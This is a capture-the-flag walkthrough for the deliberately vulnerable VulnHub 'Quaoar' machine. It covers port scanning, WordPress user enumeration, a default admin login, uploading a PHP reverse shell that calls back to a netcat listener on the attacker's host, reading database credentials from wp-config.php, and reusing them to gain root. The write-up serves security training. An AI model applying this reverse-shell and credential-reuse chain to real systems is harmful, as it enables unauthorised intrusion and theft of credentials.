VulnHub hackfest2016: Quaoar Solution

      No Comments on VulnHub hackfest2016: Quaoar Solution

For background information on this series of CTFs you may want to read this page. Or if your just after my solution please keep reading.

Quaoar

Intro

This is the first of 3 incrementally difficult CTF’s created for HackFest 2016 [email protected] and released on the VulnHub platform.

Link https://www.vulnhub.com/entry/hackfest2016-quaoar,180/

Difficulty –Very Easy

My Solution

As always start with an NMAP Scan to see what ports are open

[email protected]:~/VulnHub/quaoar# nmap -p- -Pn -v -T4 -A 192.168.5.11
. . . SNIP . . . 
Scanning 192.168.5.11 [65535 ports]
Discovered open port 22/tcp on 192.168.5.11
Discovered open port 80/tcp on 192.168.5.11
Discovered open port 993/tcp on 192.168.5.11
Discovered open port 110/tcp on 192.168.5.11
Discovered open port 995/tcp on 192.168.5.11
Discovered open port 139/tcp on 192.168.5.11
Discovered open port 143/tcp on 192.168.5.11
Discovered open port 53/tcp on 192.168.5.11
Discovered open port 445/tcp on 192.168.5.11

. . . SNIP . . .

Plenty there but lets start with the web services. on Port 80

Loading the page in a browser gives us a splash screen and a couple of images, not much else.

So throw nikto at it to see what we can find.

The most interesting point it returned was:

Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)

Loading the page shows us a basic WordPress install.

Kali comes with a tool to scan WordPress sites. wpscan. This tool is capable of enumerate users and plugins and can show you if there are vulnerabilities associated with version numbers it discovers.

[email protected]:~# wpscan -u http://192.168.5.11/wordpress -e u
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.5.11/wordpress/
[+] Started: Tue Mar 21 19:26:36 2017

[!] The WordPress 'http://192.168.5.11/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.5.11/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.5.11/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.5.11/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 8 vulnerabilities identified from the version number

Most of the vulnerabilities are XSS or CSRF but there is an SQL Injection listed.

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

And a list of usernames

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

I started looking for more details on the SQLi but couldnt find a lot of detailed information. It looks like it needed to be coupled with a plugin the mishandles post type names.

While i was researching i figured i may as well throw some creds at the logon form. Hydra is capable of doing this, but i like to use ZAP for its ease of use and feedback.

Username admin password admin makes this one easy.

If you have admin access to a wordpress install the easiest thing to do is just to upload a php reverse shell. I like to use the one from pentest monkey thats included in Kali.

Start by copying the file, edit it using your fav editor to change the callback IP and port. Then set a netcat listener.

[email protected]:~/VulnHub/quaoar# cp /usr/share/webshells/php/php-reverse-shell.php shell.php
[email protected]:~/VulnHub/quaoar# nano shell.php 
[email protected]:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...



Back on WordPress select the plugin page from the left hand menu, click ‘Add New’ and look for the link to upload a plugin in zip format.

After clicking this link select and upload your php page.

Ignore any errors that are generated on the next page and click on Media from the left hand menu. You should see your php file listed. Click the file in the browser to show its details and get the link from the description or URL fields. In my case its ‘/wordpress/wp-content/uploads/2017/04/shell.php’.

Double check your netcat listener is still active and visit this page in a browser. With any luck you should see a connection in netcat.

[email protected]:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.11: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux
 16:20:17 up  5:40,  0 users,  load average: 0.29, 0.13, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

One of the first things i do when i get a limited shell, is spawn a python tty shell and get a file listing of the box. In this instance i write it out to the web dir so i can transfer files back to me from the browser

[email protected]:~/VulnHub/quaoar# nc -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.11: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.11] 48435
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 athlon i386 GNU/Linux
 16:20:17 up  5:40,  0 users,  load average: 0.29, 0.13, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$ find / > /var/www/dirs.txt

We are looking for flags so a quick grep in the dirs.txt gives us one.

[email protected]:/$ cat /home/wpadmin/flag.txt
cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
[email protected]:/$ 

Now lets see what we have that can get us escalated privileges.  WordPress is connected to mysql and we can read the credentials from the wp-config.php file.

If you didn’t know where it was you could search for it in the dirs.txt but either way:

[email protected]:/$ cat /var/www/wordpress/wp-config.php
cat /var/www/wordpress/wp-config.php

. . . SNIP . . . 
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
. . . SNIP . . .

Password reuse is fairly common and in this case its no exception. The sql root password is the same as the host root password.

[email protected]:/$ su 
su
Password: rootpassword!

[email protected]:/# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/#

Now we have root we have a second flag in /root/flag.txt

[email protected]:/# find / -name flag.txt            
find / -name flag.txt
/root/flag.txt
/home/wpadmin/flag.txt
[email protected]:/# cat /root/flag.txt
cat /root/flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
[email protected]:/# 

Well that’s it for this one. Difficulty was spot on. Very Easy. On the next one.

As usual Questions, Queries, Comments below.